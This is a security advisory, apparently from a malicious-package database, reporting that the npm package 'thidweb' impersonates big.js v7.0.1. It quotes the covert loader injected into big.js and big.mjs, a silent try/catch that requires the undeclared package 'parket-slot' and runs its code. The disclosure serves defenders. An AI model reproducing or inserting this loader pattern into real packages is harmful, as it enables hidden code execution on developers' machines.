MAL-2026-6343

Malicious code in thidweb (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (80721058923b3e5963a6ee170007b8b4131ae5093481456ca10e63f52963987d)

Package is published as `thidweb` but its README, source comments, repo URL, and author metadata all identify it as big.js v7.0.1 by Mike McLaughlin (README.md line 1 `# big.js`; big.js header `big.js v7.0.1`; package.json repository url `https://github.com/MikeMcl/big.js.git`). The source is a verbatim copy of upstream big.js with a covert loader injected mid-file at big.js:605-609: `try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }`. The same block is present in big.mjs. `parket-slot` is not declared in `package.json` dependencies; the only declared dependency is `log-taker@^0.0.9`, which upstream big.js does not require (upstream is dependency-free). Any developer who installs `thidweb` (mistaking it for big.js) and imports it executes whatever code `parket-slot` ships, with errors silently swallowed. The combination of impersonation, undeclared runtime require, error-suppressing try/catch, and an unrelated declared dependency is a multi-stage installer-side code-execution attack.

Affected packages

npm / thidweb

No fixed version published yet for thidweb (npm). Pin to a known-safe version or switch to an alternative.
